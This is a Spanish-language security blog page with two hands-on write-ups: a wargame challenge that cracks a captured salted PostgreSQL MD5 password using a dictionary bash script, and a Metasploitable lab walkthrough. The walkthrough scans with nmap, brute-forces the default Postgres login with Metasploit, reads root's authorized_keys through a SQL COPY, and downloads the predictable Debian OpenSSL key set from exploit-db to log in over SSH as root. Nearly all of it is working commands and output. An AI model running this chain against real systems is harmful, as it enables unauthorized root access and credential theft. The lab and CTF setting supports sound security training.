hacktracking: postgres

Showing posts with label postgres. Show all posts

# Reto contraseñas postgres (md5, salt)

Introducción

En el reto 'networking 3' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos postgres.
Usuario: postgres
Salt: 0e5da2d1
Contraseña: 6fcd671f668c3c8efca3308f6f41bd17

Ejecución

# cat diccionario.txt
hack
tracking
Jixi
wargame
# cat postgres_md5_salt.sh
#!/bin/bash

function hex2ascii {
 printf %s $1 | xxd -r -p
}
function md5 {
 printf %s $1 | md5sum | cut -d ' ' -f1
}

user=$1
salt=`hex2ascii $2`
password_file=$3
captured_password=$4

while read secret
do
 hash_stage_1=`md5 $secret$user`
 #echo $hash_stage_1
 generated_password=`md5 $hash_stage_1$salt`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./postgres_md5_salt.sh postgres 0e5da2d1 \
diccionario.txt \
6fcd671f668c3c8efca3308f6f41bd17
Jixi --> 6fcd671f668c3c8efca3308f6f41bd17

# Metasploitable (postgres + openssl)

Introducción

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

Ejecución

# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)

# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root